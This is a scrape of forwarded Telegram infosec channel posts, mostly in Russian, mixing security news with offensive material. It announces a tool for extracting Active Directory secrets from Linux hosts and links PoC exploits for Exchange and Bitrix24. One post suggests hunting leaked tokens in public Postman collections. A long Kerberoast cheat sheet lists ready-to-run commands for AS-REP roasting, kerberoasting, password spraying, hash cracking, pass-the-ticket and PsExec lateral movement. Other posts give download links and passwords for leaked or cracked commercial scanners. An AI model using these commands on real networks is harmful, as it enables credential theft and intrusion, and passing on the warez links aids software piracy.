Forwarded from Волосатый бублик
#linux #ad #mimikatz
[ linikatzV2 ]
Post-exploitation tool for Unix machines attached to a Windows active directory, based on Tim (Wadhwa-)Brown Linikatz tool.
It extracts domain secrets from compromised machines, such as :
— User and machine hashes (SHA-512)
— Machine hash (NTLM) and AES keys
— Kerberos tickets
— Clear text passwords.
This tool needs root privileges to be run on the host system.
Author: 4zrm
https://github.com/Orange-Cyberdefense/LinikatzV2
[ linikatzV2 ]
Post-exploitation tool for Unix machines attached to a Windows active directory, based on Tim (Wadhwa-)Brown Linikatz tool.
It extracts domain secrets from compromised machines, such as :
— User and machine hashes (SHA-512)
— Machine hash (NTLM) and AES keys
— Kerberos tickets
— Clear text passwords.
This tool needs root privileges to be run on the host system.
Author: 4zrm
https://github.com/Orange-Cyberdefense/LinikatzV2
Please open Telegram to view this post
VIEW IN TELEGRAM
ProjectDiscovery
Introducing Nuclei v3 with improved vulnerability scanning features — ProjectDiscovery Blog
ProjectDiscovery has been working hard over the recent months! Recent template releases have been covering important CVEs and other exploitable vulnerabilities, we’ve been speaking at various conferences, and moreover, we’ve been crafting and writing major…
Forwarded from Омский багхантер
Мало кто знает, что для осинта можно использовать поиск коллекций в Postman. Часто разработчики оставляют публичные репозитории, содержащие в себе как описание всех API ручек, так и токены авторизации, пароли от админок и бд, сертификаты.
https://www.postman.com/search?q=%D0%B1%D0%B4&scope=all&type=all
https://www.postman.com/search?q=%D0%B1%D0%B4&scope=all&type=all
👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2023-36745: Microsoft Exchange Server RCE
https://securityonline.info/microsoft-exchange-server-rce-cve-2023-36745-flaw-gets-poc-exploit/
PoC: https://github.com/N1k0la-T/CVE-2023-36745
#exploit #ad #redteam #pentest
https://securityonline.info/microsoft-exchange-server-rce-cve-2023-36745-flaw-gets-poc-exploit/
PoC: https://github.com/N1k0la-T/CVE-2023-36745
#exploit #ad #redteam #pentest
Daily CyberSecurity
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
Forwarded from Pwn3rzs
Acunetix Windows v23.9.231020153 - 23 Oct 2023
Download:
The installer was leaked on our chat and then immediately deleted, so we still consider it a valid leak.
NOTE 2:
Stop begging/ asking for Linux version, until a leak happens, we can't release it
Enjoy!
Download:
https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.9.231020153-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs
NOTE:The installer was leaked on our chat and then immediately deleted, so we still consider it a valid leak.
NOTE 2:
Stop begging/ asking for Linux version, until a leak happens, we can't release it
Enjoy!
Forwarded from Netsec
Official release of CVSS v4.0
https://ift.tt/C80KsAB
Submitted November 01, 2023 at 11:39PM by adityatelange
via reddit https://ift.tt/6BcFGkm
https://ift.tt/C80KsAB
Submitted November 01, 2023 at 11:39PM by adityatelange
via reddit https://ift.tt/6BcFGkm
Infosec Exchange
FIRST.org (@firstdotorg@infosec.exchange)
Attached: 1 image
The CVSS Special Interest Group is proud to announce the official release of CVSS v4.0. This latest release marks a significant step forward with added capabilities crucial for teams with the importance of using threat intelligence and…
The CVSS Special Interest Group is proud to announce the official release of CVSS v4.0. This latest release marks a significant step forward with added capabilities crucial for teams with the importance of using threat intelligence and…
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec
➡️ ASREP-Roast
➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
➡️ Rubeus
Извлечение из всех учетных записей домена
➡️ Cracking
Windows
Linux
➡️ Brute Force
➡️ Kerbrute
➡️ Rubeus
со списком пользователей
Kerberos-based Password Spraying
➡️ Kerberoasting
➡️ Impacket
➡️ Rubeus
Kerberoast всех пользователей домена
Все пользователи в поздразделении OU
Атака на конкретных пользователей
➡️ Pass-The-Ticket
➡️ Mimikatz
Сбор тикетов
Инжект тикета
Создать CMD с инжектированным тикетом
➡️ Rubeus
Дамп тикетов
Инжект тикета
➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
🌚 @poxek
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
Rubeus
Kerbrute
Impacket
PsExec
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproastㅤ
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgsㅤ
hashcat -m 18200 -a 3 Hashes.txt rockyou
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>ㅤ
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>ㅤ
Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>ㅤ
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -requestㅤ
Kerberoast всех пользователей домена
.\Rubeus kerberoastㅤ
Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=localㅤ
Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVCㅤ
Сбор тикетов
sekurlsa::tickets /export
Инжект тикета
kerberos::ptt <.kirbi file>
Создать CMD с инжектированным тикетом
misc::cmdㅤ
Дамп тикетов
.\Rubeus.exe dump
Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>ㅤ
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmdㅤ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
🔥 Bitrix24 Multiple Vulnerabilities
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
Forwarded from Пост Лукацкого
Список Топ10 сценариев (use cases), которые необходимо использовать в SOC, который мониторит АСУ ТП. Это не значит, что не надо мониторить все остальное; просто с этого стоит начинать.
Forwarded from sdnv's funk-hole
Media is too big
VIEW IN TELEGRAM
Доклад в УрФУ на тему Kerberos от Миши из RedTeam Brazzers.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
👍1
Forwarded from Pwn3rzs
PingCastle Pro (No Server Side) 3.1.0.1
Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
Down : https://mir.cr/0JECBXGW
Passw : 20231109_1912
Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
#pentest #web
Nuclei + Wordfence =💗
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.
Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!
💻 Github
Nuclei + Wordfence =
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.
Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!
💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - topscoder/nuclei-wordfence-cve: 60k+ WordPress Nuclei templates, updated daily from Wordfence intel—filter by severity/tags/CVE…
60k+ WordPress Nuclei templates, updated daily from Wordfence intel—filter by severity/tags/CVE and scan in one line. 🚀🔒 - topscoder/nuclei-wordfence-cve
Forwarded from RedTeam brazzers (Pavel Shlundin)
Как и в том году мой бывший коллега со своей командой CTI создали новый огромный отчёт. На этот раз про азиатским APT группировки!
Отчёт содержит 370 страниц подробного анализа о различных азиатских APT группировок с описанием TTPs, анализом действий атакующих на основе "Unified Kill Chain" и много других крутых штук, отчёт доступен для скачивания в RU и EN вариантах.
P.S. Данный материал на 14:00 по мск эксклюзив.
Отчёт содержит 370 страниц подробного анализа о различных азиатских APT группировок с описанием TTPs, анализом действий атакующих на основе "Unified Kill Chain" и много других крутых штук, отчёт доступен для скачивания в RU и EN вариантах.
P.S. Данный материал на 14:00 по мск эксклюзив.
🔥1
Forwarded from RedTeam brazzers (Pavel Shlundin)